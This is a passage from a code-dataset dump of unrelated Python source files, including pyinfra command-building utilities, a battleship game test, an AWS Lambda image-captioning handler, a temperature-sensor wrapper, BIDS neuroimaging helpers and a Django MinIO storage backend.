sorted(set(new_data[:,0])): # column 0 is the model column\n\t\t\t# Getting all Rs for that model #\n\t\t\tcurrent_rs = new_data[np.where(new_data[:,0]==m)][:,2] # column 2 contains R\n\t\t\t# Getting the histogram\n\t\t\ta,b = np.histogram(current_rs,bins=np.arange(vmin,vmax+0.0001,0.01))\n\t\t\tmax_count = float(np.max(a))\n\t\t\tfor i in range(len(a)):\n\t\t\t\tX.append(m); Y.append((b[i]+b[i+1])/2.0); Z.append(a[i]/float(np.max(a)));\n\t\t\n\t\t# Finally, creating (but not showing) the graph \n\t\tplt.clf()\n\t\tdraw_xyz(X = X , Y = Y , Z = Z\n\t\t ,xlabel ='Frame #', ylabel =\"$\\mathcal{R}$\",zlabel =\"$P'(\\mathcal{R})$:\"\n\t\t\t ,cmap = 'Greys', ylim=[vmin,vmax],title='Per-model $\\mathcal{R}$-histogram\\nPDB: %s'%(final_name))\n\t\tplt.yticks(np.arange(vmin,vmax+0.00001,0.2))\n\t\t# Now, we display the graph:\n\t\tFN = target_base+'pdb_%s_his'%(final_name)\n\t\twrite_image(FN)\n\t\tprint(\"\\tSaved to:\",FN)\n\t#\n\t#\n\t\n\tprint(\" 3. \\tRMSF Test (PDB: {})\".format(pdbfn))\n\tfor chain in list(grouped_data.keys()):\n\t\tfinal_name = name\n\t\tif len(chain.rstrip()):\n\t\t\tfinal_name+='-'+str(chain)\n\t\t\n\t\t# Getting the X,Y,Z values for each entry\n\t\tmodels, residues, Rs = grouped_data[chain]\n\t\t\n\t\tif len(set(models)) > 1:\n\t\t\tX = []; Y=[]; Z=[]; # Will set X=model, Y=R, Z=P(R)\n\t\t\t# Bundling the three lists into one 2d array\n\t\t\tnew_data = np.array(list(zip(models,residues,Rs)))\n\t\t\t\n\t\t\treference_model_number = sorted(set(models))[0]\n\t\t\t\n\t\t\treference_data = new_data[new_data[:,0]==reference_model_number]\n\t\t\t\n\t\t\tfinal_data = []\n\t\t\tsorted_models = sorted(set(models))\n\t\t\tfor mx in range(1,len(sorted_models)):\n\t\t\t\tm1 = sorted_models[mx-1]\n\t\t\t\tm2 = sorted_models[mx]\n\t\t\t\t\n\t\t\t\tcurrent_model = new_data[new_data[:,0]==m2]\n\t\t\t\tcurrent_model[:,2] = np.abs(current_model[:,2] - new_data[new_data[:,0]==m1][:,2])\n\t\t\t\tif not len(final_data):\n\t\t\t\t\tfinal_data = copy.deepcopy(current_model)\n\t\t\t\telse:\n\t\t\t\t\tfinal_data = np.append(final_data,current_model,axis=0)\n\t\t\t\t#\n\t\t\t\t\n\t\t\tX = final_data[:,0]; \n\t\t\tY = final_data[:,1]; \n\t\t\tZ = final_data[:,2]; \n\t\t\t\n\t\t\t# Finally, creating (but not showing) the graph \n\t\t\tplt.clf()\n\t\t\tdraw_xyz(X = X , Y = Y , Z = Z\n\t\t\t ,xlabel ='Frame #', ylabel =\"$Residue \\#$\",zlabel =\"$D_{-1}$\"\n\t\t\t\t ,cmap = 'Blues', title='Per-residue deviation $D_{-1} = |\\mathcal{R}_t - \\mathcal{R}_{t-1}|$\\nPDB: %s'%(final_name))\n\t\t\t\n\t\t\t# Now, we display the graph:\n\t\t\tFN = target_base+'pdb_%s_rmsf'%(final_name)\n\t\t\twrite_image(FN)\n\t\t\tprint(\"\\tSaved to:\",FN)\n\t\telse:\n\t\t\tprint('\\tChain \"%s\" has only one model. Not drawing this graph.' %(chain))\n\t#\n\t#\n\tprint(' 4. \\tRMSD Test (PDB: {})'.format(pdbfn))\n\tfor chain in list(grouped_data.keys()):\n\t\tfinal_name = name\n\t\tif len(chain.rstrip()):\n\t\t\tfinal_name+='-'+str(chain)\n\t\t\n\t\t# Getting the X,Y,Z values for each entry\n\t\tmodels, residues, Rs = grouped_data[chain]\n\t\t\n\t\t\n\t\tif len(set(models)) > 1:\n\t\t\tX = []; Y=[]; Z=[]; # Will set X=model, Y=R, Z=P(R)\n\t\t\t# Bundling the three lists into one 2d array\n\t\t\tnew_data = np.array(list(zip(models,residues,Rs)))\n\t\t\t\n\t\t\treference_model_number = sorted(set(models))[0]\n\t\t\t\n\t\t\treference_data = new_data[new_data[:,0]==reference_model_number]\n\t\t\t\n\t\t\tfinal_data = []\n\t\t\tfor m in sorted(set(models)):\n\t\t\t\tcurrent_model = new_data[new_data[:,0]==m]\n\t\t\t\tcurrent_model[:,2] = np.abs(current_model[:,2] - reference_data[:,2])\n\t\t\t\tif not len(final_data):\n\t\t\t\t\tfinal_data = copy.deepcopy(current_model)\n\t\t\t\telse:\n\t\t\t\t\tfinal_data = np.append(final_data,current_model,axis=0)\n\t\t\t\t#\n\t\t\t\t\n\t\t\tX = final_data[:,0]; \n\t\t\tY = final_data[:,1]; \n\t\t\tZ = final_data[:,2]; \n\t\t\t\n\t\t\t\n\t\t\t# Finally, creating (but not showing) the graph \n\t\t\tplt.clf()\n\t\t\tdraw_xyz(X = X , Y = Y , Z = Z\n\t\t\t ,xlabel ='Frame #', ylabel =\"$Residue \\#$\", zlabel =\"$D_{1}$\"\n\t\t\t\t ,cmap = 'Reds', title='Per-residue deviation $D_{1} = |\\mathcal{R}_t - \\mathcal{R}_{1}|$\\nPDB: %s'%(final_name))\n\t\t\t#plt.yticks(np.arange(0,1.00001,0.2))\n\t\t\t# Now, we display the graph:\n\t\t\tFN = target_base+'pdb_%s_rmsd'%(final_name)\n\t\t\twrite_image(FN)\n\t\t\tprint(\"\\tSaved to:\",FN)\n\t\telse:\n\t\t\tprint('\\tChain \"%s\" has only one model. Not drawing this graph.' %(chain))\n\t#\n\t##########################################################################################################\n\t##########################################################################################################\n\t##########################################################################################################\n\t##########################################################################################################\n#\n\nfrom ._version import get_versions\n__version__ = get_versions()['version']\ndel get_versions\n\nif __name__ == \"__main__\":\n\tprint('Please use \"python -m backmap\" for the standalone version of backmap.')\n\t\n#from ._version import get_versions\n#__version__ = get_versions()['version']\n#del get_versions\n","sub_path":"backmap/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":44903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"259291011","text":"# pyinfra\n# File: pyinfra/api/util.py\n# Desc: utility functions\n\nfrom __future__ import division, print_function, unicode_literals\n\nimport re\nfrom hashlib import sha1\nfrom imp import load_source\nfrom socket import (\n error as socket_error,\n timeout as timeout_error,\n)\nfrom types import GeneratorType\n\nimport click\nimport six\n\nfrom jinja2 import Template\nfrom paramiko import SSHException\nfrom six.moves import shlex_quote\n\nfrom pyinfra import logger\n\nfrom .attrs import AttrBase\n\n# 64kb chunks\nBLOCKSIZE = 65536\n\n# Template cache\nTEMPLATES = {}\nFILE_SHAS = {}\n\n\ndef ensure_host_list(hosts, inventory):\n if hosts is None:\n return hosts\n\n # If passed a string, treat as group name and get hosts from inventory\n if isinstance(hosts, six.string_types):\n return inventory.get_group(hosts)\n\n if not isinstance(hosts, (list, tuple)):\n return [hosts]\n\n return hosts\n\n\ndef pop_op_kwargs(state, kwargs):\n '''\n Pop and return operation global keyword arguments.\n '''\n\n meta_kwargs = state.deploy_kwargs or {}\n\n def get_kwarg(key, default=None):\n return kwargs.pop(key, meta_kwargs.get(key, default))\n\n # Get the env for this host: config env followed by command-level env\n env = state.config.ENV.copy()\n env.update(get_kwarg('env', {}))\n\n hosts = get_kwarg('hosts')\n hosts = ensure_host_list(hosts, inventory=state.inventory)\n\n # Filter out any hosts not in the meta kwargs (nested support)\n if meta_kwargs.get('hosts') is not None:\n hosts = [\n host for host in hosts\n if host in meta_kwargs['hosts']\n ]\n\n return {\n # ENVars for commands in this operation\n 'env': env,\n # Hosts to limit the op to\n 'hosts': hosts,\n # When to limit the op (default always)\n 'when': get_kwarg('when', True),\n # Locally & globally configurable\n 'sudo': get_kwarg('sudo', state.config.SUDO),\n 'sudo_user': get_kwarg('sudo_user', state.config.SUDO_USER),\n 'su_user': get_kwarg('su_user', state.config.SU_USER),\n # Whether to preserve ENVars when sudoing (eg SSH forward agent socket)\n 'preserve_sudo_env': get_kwarg(\n 'preserve_sudo_env', state.config.PRESERVE_SUDO_ENV,\n ),\n # Ignore any errors during this operation\n 'ignore_errors': get_kwarg(\n 'ignore_errors', state.config.IGNORE_ERRORS,\n ),\n # Timeout on running the command\n 'timeout': get_kwarg('timeout'),\n # Get a PTY before executing commands\n 'get_pty': get_kwarg('get_pty', False),\n # Forces serial mode for this operation (--serial for one op)\n 'serial': get_kwarg('serial', False),\n # Only runs this operation once\n 'run_once': get_kwarg('run_once', False),\n # Execute in batches of X hosts rather than all at once\n 'parallel': get_kwarg('parallel'),\n # Callbacks\n 'on_success': get_kwarg('on_success'),\n 'on_error': get_kwarg('on_error'),\n # Operation hash\n 'op': get_kwarg('op'),\n }\n\n\ndef unroll_generators(generator):\n '''\n Take a generator and unroll any sub-generators recursively. This is\n essentially a Python 2 way of doing `yield from` in Python 3 (given\n iterating the entire thing).\n '''\n\n # Ensure we have a generator (prevents ccommands returning lists)\n if not isinstance(generator, GeneratorType):\n raise TypeError('{0} is not a generator'.format(generator))\n\n items = []\n\n for item in generator:\n if isinstance(item, GeneratorType):\n items.extend(unroll_generators(item))\n else:\n items.append(item)\n\n return items\n\n\ndef exec_file(filename, return_locals=False):\n '''\n Execute a Python file and optionally return it's attributes as a dict.\n '''\n\n module_name = '_pyinfra_{0}'.format(filename.replace('.', '_'))\n module = load_source(module_name, filename)\n\n if return_locals:\n return {\n key: getattr(module, key)\n for key in dir(module)\n }\n\n\ndef get_template(filename_or_string, is_string=False):\n '''\n Gets a jinja2 ``Template`` object for the input filename or string, with caching\n based on the filename of the template, or the SHA1 of the input string.\n '''\n\n # Cache against string sha or just the filename\n cache_key = sha1_hash(filename_or_string) if is_string else filename_or_string\n\n if cache_key in TEMPLATES:\n return TEMPLATES[cache_key]\n\n if is_string:\n # Set the input string as our template\n template_string = filename_or_string\n\n else:\n # Load template data into memory\n with open(filename_or_string, 'r') as file_io:\n template_string = file_io.read()\n\n TEMPLATES[cache_key] = Template(template_string, keep_trailing_newline=True)\n return TEMPLATES[cache_key]\n\n\ndef underscore(name):\n '''\n Transform CamelCase -> snake_case.\n '''\n\n s1 = re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', name)\n return re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', s1).lower()\n\n\ndef sha1_hash(string):\n '''\n Return the SHA1 of the input string.\n '''\n\n hasher = sha1()\n hasher.update(string.encode())\n return hasher.hexdigest()\n\n\ndef format_exception(e):\n return '{0}{1}'.format(e.__class__.__name__, e.args)\n\n\ndef log_host_command_error(host, e, timeout=0):\n if isinstance(e, timeout_error):\n logger.error('{0}{1}'.format(\n host.print_prefix,\n click.style('Command timed out after {0}s'.format(\n timeout,\n ), 'red'),\n ))\n\n elif isinstance(e, (socket_error, SSHException)):\n logger.error('{0}{1}'.format(\n host.print_prefix,\n click.style('Command socket/SSH error: {0}'.format(\n format_exception(e)), 'red',\n ),\n ))\n\n\ndef make_command(\n command,\n env=None,\n su_user=None,\n sudo=False,\n sudo_user=None,\n preserve_sudo_env=False,\n):\n '''\n Builds a shell command with various kwargs.\n '''\n\n debug_meta = {}\n\n for key, value in (\n ('sudo', sudo),\n ('sudo_user', sudo_user),\n ('su_user', su_user),\n ('env', env),\n ):\n if value:\n debug_meta[key] = value\n\n logger.debug('Building command ({0})'.format(' '.join(\n '{0}: {1}'.format(key, value)\n for key, value in six.iteritems(debug_meta)\n )))\n\n # Use env & build our actual command\n if env:\n env_string = ' '.join([\n '{0}={1}'.format(key, value)\n for key, value in six.iteritems(env)\n ])\n command = 'export {0}; {1}'.format(env_string, command)\n\n # Quote the command as a string\n command = shlex_quote(command)\n\n # Switch user with su\n if su_user:\n command = 'su {0} -c {1}'.format(su_user, command)\n\n # Otherwise just sh wrap the command\n else:\n command = 'sh -c {0}'.format(command)\n\n # Use sudo (w/user?)\n if sudo:\n sudo_bits = ['sudo', '-H']\n\n if preserve_sudo_env:\n sudo_bits.append('-E')\n\n if sudo_user:\n sudo_bits.extend(('-u', sudo_user))\n\n command = '{0} {1}'.format(' '.join(sudo_bits), command)\n\n return command\n\n\ndef get_arg_value(state, host, arg):\n '''\n Runs string arguments through the jinja2 templating system with a state and host. Used\n to avoid string formatting in deploy operations which result in one operation per\n host/variable. By parsing the commands after we generate the ``op_hash``, multiple\n command variations can fall under one op.\n '''\n\n if isinstance(arg, six.string_types):\n template = get_template(arg, is_string=True)\n data = {\n 'host': host,\n 'inventory': state.inventory,\n }\n\n return template.render(data)\n\n elif isinstance(arg, list):\n return [get_arg_value(state, host, value) for value in arg]\n\n elif isinstance(arg, tuple):\n return tuple(get_arg_value(state, host, value) for value in arg)\n\n elif isinstance(arg, dict):\n return {\n key: get_arg_value(state, host, value)\n for key, value in six.iteritems(arg)\n }\n\n return arg\n\n\ndef make_hash(obj):\n '''\n Make a hash from an arbitrary nested dictionary, list, tuple or set, used to generate\n ID's for operations based on their name & arguments.\n '''\n\n if isinstance(obj, (set, tuple, list)):\n hash_string = ''.join([make_hash(e) for e in obj])\n\n elif isinstance(obj, dict):\n hash_string = ''.join(\n ''.join((key, make_hash(value)))\n for key, value in six.iteritems(obj)\n )\n\n else:\n hash_string = (\n # pyinfra attr key where available (host/inventory data), see attrs.py\n obj.pyinfra_attr_key if isinstance(obj, AttrBase)\n # Plain strings\n else obj if isinstance(obj, six.string_types)\n # Objects with names\n else obj.__name__ if hasattr(obj, '__name__')\n # Repr anything else\n else repr(obj)\n )\n\n return sha1_hash(hash_string)\n\n\nclass get_file_io(object):\n '''\n Given either a filename or an existing IO object, this context processor will open\n and close filenames, and leave IO objects alone.\n '''\n\n close = False\n\n def __init__(self, filename_or_io):\n if not (\n # Check we can be read\n hasattr(filename_or_io, 'read')\n # Or we're a filename\n or isinstance(filename_or_io, six.string_types)\n ):\n raise TypeError('Invalid filename or IO object: {0}'.format(\n filename_or_io,\n ))\n\n self.filename_or_io = filename_or_io\n\n def __enter__(self):\n # If we have a read attribute, just use the object as-is\n if hasattr(self.filename_or_io, 'read'):\n file_io = self.filename_or_io\n\n # Otherwise, assume a filename and open it up\n else:\n file_io = open(self.filename_or_io, 'rb')\n\n # Attach to self for closing on __exit__\n self.file_io = file_io\n self.close = True\n\n # Ensure we're at the start of the file\n file_io.seek(0)\n return file_io\n\n def __exit__(self, type, value, traceback):\n if self.close:\n self.file_io.close()\n\n @property\n def cache_key(self):\n # If we're a filename, cache against that - we don't cache in-memory\n # file objects.\n if isinstance(self.filename_or_io, six.string_types):\n return self.filename_or_io\n\n\ndef get_file_sha1(filename_or_io):\n '''\n Calculates the SHA1 of a file or file object using a buffer to handle larger files.\n '''\n\n file_data = get_file_io(filename_or_io)\n cache_key = file_data.cache_key\n\n if cache_key and cache_key in FILE_SHAS:\n return FILE_SHAS[cache_key]\n\n with file_data as file_io:\n hasher = sha1()\n buff = file_io.read(BLOCKSIZE)\n\n while len(buff) > 0:\n if isinstance(buff, six.text_type):\n buff = buff.encode('utf-8')\n\n hasher.update(buff)\n buff = file_io.read(BLOCKSIZE)\n\n digest = hasher.hexdigest()\n\n if cache_key:\n FILE_SHAS[cache_key] = digest\n\n return digest\n\n\ndef read_buffer(io, print_output=False, print_func=False):\n '''\n Reads a file-like buffer object into lines and optionally prints the output.\n '''\n\n # TODO: research this further - some steps towards handling stdin (ie password requests\n # from programs that don't notice there's no TTY to accept passwords from!). This just\n # prints output as below, but stores partial lines in a buffer, which could be printed\n # when ready to accept input. Or detected and raise an error.\n\n # GitHub issue: https://github.com/Fizzadar/pyinfra/issues/40\n\n # buff = ''\n # data = io.read(1)\n\n # while data:\n # # Append to the buffer\n # buff += data\n\n # # Newlines in the buffer? Break them out\n # if '\\n' in buff:\n # lines = buff.split('\\n')\n\n # # Set the buffer back to just the last line\n # buff = lines[-1]\n\n # # Get the other lines, strip them\n # lines = [\n # line.strip()\n # for line in lines[:-1]\n # ]\n\n # out.extend(lines)\n\n # for line in lines:\n # _print(line)\n\n # # Get next data\n # data = io.read(1)\n\n # if buff:\n # line = buff.strip()\n # out.append(line)\n # _print(line)\n\n def _print(line):\n if print_output:\n if print_func:\n print(print_func(line))\n else:\n print(line)\n\n out = []\n\n for line in io:\n # Handle local Popen shells returning list of bytes, not strings\n if not isinstance(line, six.text_type):\n line = line.decode('utf-8')\n\n line = line.strip()\n out.append(line)\n\n _print(line)\n\n return out\n","sub_path":"pyinfra/api/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":13101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"18668027","text":"import queue\nimport threading\nimport time\nimport unittest\nfrom datetime import datetime\nfrom battleships_pb2 import Attack, Request, Status\nfrom server import Battleship\n\nREDIS_HOST = 'localhost'\n\n\ndef stream(q, p):\n while True:\n s = q.get()\n if s is not None:\n print(f'{datetime.now()} - {p} - Sending -', s, flush=True)\n yield s\n else:\n return\n\n\ndef read_incoming(input_stream, s):\n while True:\n try:\n response = next(input_stream)\n print(f'{datetime.now()} - {s} - Received -', response, flush=True)\n except StopIteration:\n return\n\n\ndef attack(vector):\n return Request(move=Attack(vector=vector))\n\n\ndef report(state):\n return Request(report=Status(state=state))\n\n\ndef start_thread(_stream, name):\n t = threading.Thread(target=lambda: read_incoming(_stream, name))\n t.daemon = True\n t.start()\n\n\ndef test_simple_game_play():\n delay = 0.5\n\n player_1 = 'Alice'\n player_2 = 'Bob'\n\n alice = queue.Queue()\n bob = queue.Queue()\n game_server_1 = Battleship(REDIS_HOST)\n game_server_2 = Battleship(REDIS_HOST)\n\n input_stream_1 = game_server_1.Game(stream(alice, player_1), {})\n input_stream_2 = game_server_2.Game(stream(bob, player_2), {})\n\n start_thread(input_stream_1, player_1)\n start_thread(input_stream_2, player_2)\n\n # Both players join\n alice.put(Request(join=Request.Player(id=player_1)))\n time.sleep(delay)\n bob.put(Request(join=Request.Player(id=player_2)))\n time.sleep(delay)\n\n # Player 1 gets to start\n alice.put(attack(\"a1\"))\n bob.put(report(Status.State.MISS))\n time.sleep(delay)\n\n # Now it is Player 2's turn\n bob.put(attack(\"j10\"))\n alice.put(report(Status.State.HIT))\n time.sleep(delay)\n\n # Now it is Player 1's turn\n alice.put(attack(\"c5\"))\n bob.put(report(Status.State.MISS))\n time.sleep(delay)\n\n # Now it is Player 2's turn\n bob.put(attack(\"e3\"))\n alice.put(report(Status.State.DEFEAT))\n time.sleep(delay)\n\n alice.put(None)\n bob.put(None)\n time.sleep(1)\n\n\n# class TestGamePlay(unittest.TestCase):\n# def test_simple_game_play(self):\n# test_simple_game_play()\n\n\nif __name__ == '__main__':\n test_simple_game_play()\n","sub_path":"server/test/test_game_play.py","file_name":"test_game_play.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"262123311","text":"#coding:utf-8\nclass Solution(object):\n def romanToInt(self, s):\n \"\"\"\n :type num: int\n :rtype: str\n \"\"\"\n dict = {'I':1,'V':5,'X':10,'L':50,'C':100,'D':500,'M':1000}\n num = 0\n for i in range(len(s)-1):\n if dict[s[i]] < dict[s[i+1]]:\n num -= dict[s[i]]\n else:\n num += dict[s[i]]\n\n #加上字符串最后一个数\n num += dict[s[-1]]\n return num\n\n\n\nif __name__ == '__main__':\n s = Solution()\n input = \"MCMXCIV\"\n result = s.romanToInt(input)\n print(result)\n","sub_path":"013.romanToInt.py","file_name":"013.romanToInt.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"576260685","text":"try:\n import unzip_requirements\nexcept ImportError:\n pass\n\nfrom PIL import Image\nimport numpy as np\n\nimport boto3\nimport os\nimport io\nimport base64\nimport json\nfrom requests_toolbelt.multipart import decoder\n\nfrom image_caption import load_model, load_word_map, caption_image\nprint(\"Import end...\")\n\nS3_BUCKET = 'motley-imagecaption-flickr30k'\nMODEL_PATH = 'imageCaption_flickr30k_checkpoint.pth.tar'\nword_map_file = 'WORDMAP.json'\n\ns3 = boto3.client('s3')\n\n# Load checkpoint file from S3. Load encoder, decoder model from the checkpoint using image_caption.load_model\ntry:\n if os.path.isfile(MODEL_PATH) != True:\n obj = s3.get_object(Bucket = S3_BUCKET, Key = MODEL_PATH)\n print(\"Downloading model...\")\n checkpoint = io.BytesIO(obj['Body'].read())\n print(\"Checkpoint loaded\")\n encoder_model, decoder_model = load_model(checkpoint)\n print(\"Encoder-Decoder model loaded\")\n\nexcept Exception as e:\n print(repr(e))\n raise(e)\n\n# Load word_map and rev_word_map dictionaries from word_map_file json.\nword_map, rev_word_map = load_word_map(word_map_file)\nprint(\"Word map dict loaded\")\n\n# Load input image from event.\ndef load_input_image(event):\n # Returns PIL image and uploaded filename.\n content_type_header = event['headers']['content-type']\n body = base64.b64decode(event[\"body\"])\n print(\"Image body in caption_image loaded\")\n picture = decoder.MultipartDecoder(body, content_type_header).parts[0]\n filename = picture.headers[b'Content-Disposition'].decode().split(';')[1].split('=')[1]\n if len(filename) < 4:\n filename = picture.headers[b'Content-Disposition'].decode().split(';')[2].split('=')[1]\n print(\"picture object from body- \",picture)\n print(\"picture object content from body- \", picture.content)\n input_image = Image.open(io.BytesIO(picture.content))\n return input_image, filename\n\n\ndef caption_this(event, context):\n try:\n image, filename = load_input_image(event)\n\n caption = caption_image(encoder_model, decoder_model, image, word_map, rev_word_map)\n\n return {\n \"statusCode\": 200,\n \"headers\": {\n 'Content-Type': 'application/json',\n 'Access-Control-Allow-Origin': '*',\n \"Access-Control-Allow-Credentials\": True\n },\n \"body\": json.dumps({'file': filename.replace('\"', ''), 'caption': caption})\n }\n\n except Exception as e:\n print(repr(e))\n return {\n \"statusCode\": 500,\n \"headers\": {\n 'Content-Type': 'application/json',\n 'Access-Control-Allow-Origin': '*',\n \"Access-Control-Allow-Credentials\": True\n },\n \"body\": json.dumps({\"error\": repr(e)})\n }\n","sub_path":"12 - Image Captioning & Text to Images/deployment/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"168558071","text":"N,K=map(int,input().split())\nList = list(map(int, input().split()))\n \ndef imosu(x,k):\n data = [0]*k\n for i in range(k):\n first = i-x[i]\n last = i+x[i]\n if first < 0:\n first = 0\n data[first] += 1\n if last+1 < k:\n data[last+1] +=-1\n ruiseki = [0]*k\n ruiseki[0] = data[0]\n for i in range(k-1):\n ruiseki[i+1] = ruiseki[i] + data[i+1]\n return ruiseki\n \nfor i in range(K):\n List = imosu(List,N)\n if List.count(N) == N:\n break\nprint(*List)","sub_path":"Python_codes/p02647/s608748102.py","file_name":"s608748102.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"369665622","text":"from typing import Optional\nfrom datetime import datetime\nfrom w1thermsensor import W1ThermSensor, Sensor\nfrom w1thermsensor import NoSensorFoundError, SensorNotReadyError, ResetValueError\nfrom .measurements import Measurement, MeasurementError\n\ndef enumerate_sensors():\n sensors = []\n for available_sensor in W1ThermSensor.get_available_sensors([Sensor.DS18B20]):\n try:\n sensor = ds18b20(available_sensor.id)\n except Exception as error:\n print(\"Error initialising DS18B20 sensor with ID {}: {}\".format(available_sensor.id, str(error)))\n else:\n print(\"Found DS18B20 sensor with ID {:012x}\".format(sensor.serial_number))\n sensors.append(sensor)\n return sensors\n\n\nclass ds18b20():\n\n manufacturer = 'MAXIM'\n model = 'DS18B20'\n supported_measurements = [Measurement.TEMPERATURE]\n\n def __init__(self, sensor_id: Optional[str] = None):\n self._w1therm = W1ThermSensor(sensor_type=Sensor.DS18B20, sensor_id=sensor_id)\n self._id = sensor_id\n self.temperature = None\n\n def update_sensor(self):\n try:\n self.temperature = self._w1therm.get_temperature()\n except (NoSensorFoundError, SensorNotReadyError, ResetValueError) as error:\n raise MeasurementError(str(error))\n else:\n self.timestamp = datetime.now().isoformat(timespec='seconds')\n\n @property\n def id(self):\n \"\"\"A unique identifier for the device.\"\"\"\n return \"{model:s}--{serial:012x}\".format(model=self.model.replace('-',''), serial=self.serial_number).lower()\n\n @property\n def serial_number(self):\n \"\"\"The hardware identifier (serial number) for the device.\"\"\"\n serial = int(self._id, 16)\n return serial\n","sub_path":"sensors/ds18b20.py","file_name":"ds18b20.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"45552222","text":"from glob import glob\nimport copy\nimport json\nimport os\nimport re\n\nINPUTS_SPEC = {'fieldmaps': [], 'epi': '', 'sbref': [], 't1': ''}\n\ndef gen_list(inlist, base=1):\n return range(base, len(inlist) + base)\n\ndef _walk_dir_for_prefix(target_dir, prefix):\n return [x for x in next(os.walk(target_dir))[1]\n if x.startswith(prefix)]\n\n\ndef get_subject(bids_root, subject_id, session_id=None, run_id=None,\n include_types=None):\n \"\"\"\n Returns the imaging_data structure for the subject subject_id.\n If session is None, then the BIDS structure is not multisession.\n If run_id is None, it is assumed that the session does not have several\n runs.\n \"\"\"\n if include_types is None:\n # Please notice that dwi is not here\n include_types = ['func', 'anat', 'fmap']\n subject_data = collect_bids_data(bids_root, include_types=None)\n subject_data = subject_data['sub-' + subject_id]\n\n if session_id is None:\n subject_data = subject_data[list(subject_data.keys())[0]]\n else:\n raise NotImplementedError\n\n if run_id is not None:\n raise NotImplementedError\n\n return subject_data\n\n\n# if no scan_subject or scan_session are defined return all bids data for a\n# given bids directory. Otherwise just the data for a given subject or scan\n# can be returned\ndef collect_bids_data(dataset, include_types=None, scan_subject='sub-',\n scan_session='ses-'):\n imaging_data = {}\n if include_types is None:\n include_types = ['func', 'anat', 'fmap', 'dwi']\n\n subjects = _walk_dir_for_prefix(dataset, scan_subject)\n if len(subjects) == 0:\n raise GeneratorExit(\"No BIDS subjects found to examine.\")\n\n for subject in subjects:\n if subject not in imaging_data:\n imaging_data[subject] = {}\n subj_dir = os.path.join(dataset, subject)\n\n sessions = _walk_dir_for_prefix(subj_dir, scan_session)\n\n for scan_type in include_types:\n # seems easier to consider the case of multi-session vs.\n # single session separately?\n if len(sessions) > 0:\n subject_sessions = [os.path.join(subject, x)\n for x in sessions]\n else:\n subject_sessions = [subject]\n\n for session in subject_sessions:\n if session not in imaging_data[subject]:\n imaging_data[subject][session] = copy.deepcopy(INPUTS_SPEC)\n scan_files = glob(os.path.join(dataset, session, scan_type,\n '*'))\n\n for scan_file in scan_files:\n filename = scan_file.split('/')[-1]\n filename_parts = filename.split('_')\n modality = filename_parts[-1]\n if 'sbref.nii' in modality:\n imaging_data[subject][session]['sbref'].append(scan_file)\n elif 'epi.nii' in modality:\n imaging_data[subject][session]['fieldmaps'].append(scan_file)\n elif 'T1w.nii' in modality:\n imaging_data[subject][session]['t1'] = scan_file\n # temporary conditional until runs and tasks are handled\n # in the imaging data structure\n elif 'rest_acq-LR_run-1' in filename:\n if 'bold.nii' in modality:\n imaging_data[subject][session]['epi'] = scan_file\n else:\n pass\n\n return imaging_data\n\nif __name__ == '__main__':\n pass\n","sub_path":"fmriprep/utils/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":3635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"254394075","text":"from __future__ import unicode_literals\n\nimport minio\nfrom minio.error import ResponseError\n\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.core.files.storage import Storage\nfrom django.utils.deconstruct import deconstructible\nfrom django.conf import settings\n\nimport mimetypes\nimport datetime\n\nfrom logging import getLogger\n\nlogger = getLogger(\"minio_storage\")\n\n\ndef get_setting(name, default=None):\n result = getattr(settings, name, default)\n if result is None:\n print(\"Attr {} : {}\".format(name, getattr(settings, name, default)))\n raise ImproperlyConfigured\n else:\n return result\n\n\n@deconstructible\nclass MinioStorage(Storage):\n \"\"\"\n An implementation of Django's file storage using the minio client.\n \"\"\"\n\n def __init__(self):\n self.endpoint = get_setting(\"MINIO_STORAGE_ENDPOINT\")\n self.access_key = get_setting(\"MINIO_STORAGE_ACCESS_KEY\")\n self.secret_key = get_setting(\"MINIO_STORAGE_SECRET_KEY\")\n self.secure = get_setting(\"MINIO_STORAGE_USE_HTTPS\", True)\n\n self.client = minio.Minio(self.endpoint,\n access_key=self.access_key,\n secret_key=self.secret_key,\n secure=self.secure)\n\n super(MinioStorage, self).__init__()\n\n def _sanitize_path(self, name):\n return name.lstrip(\"./\")\n\n def _examine_file(self, name, content):\n \"\"\"\n Examines a file and produces information necessary for upload.\n\n Returns a tuple of the form (content_size, content_type, sanitized_name)\n \"\"\"\n content_size = content.size\n content_type = mimetypes.guess_type(name, strict=False)\n content_type = content_type[0] or \"application/octet-stream\"\n sane_name = self._sanitize_path(name)\n return (content_size, content_type, sane_name)\n\n def _open(self, name, mode=\"rb\"):\n if mode.find(\"w\") > -1:\n raise NotImplementedError(\"Minio storage cannot write to file\")\n try:\n return self.client.get_object(self.bucket_name, name)\n except ResponseError as error:\n logger.warn(error)\n raise IOError(\"File {} does not exist\".format(name))\n\n def _save(self, name, content):\n # (str, bytes) -> str\n try:\n content_size, content_type, sane_name = self._examine_file(name, content)\n self.client.put_object(self.bucket_name,\n sane_name,\n content,\n content_size,\n content_type)\n return sane_name\n except ResponseError as error:\n logger.warn(error)\n raise IOError(\"File {} could not be saved\".format(name))\n\n def delete(self, name):\n # type: (str) -> None\n try:\n self.client.remove_object(self.bucket_name, name)\n except ResponseError as error:\n logger.warn(\"Object deletion failed\")\n logger.warn(error)\n raise IOError(\"Could not remove file {}\".format(name))\n\n def exists(self, 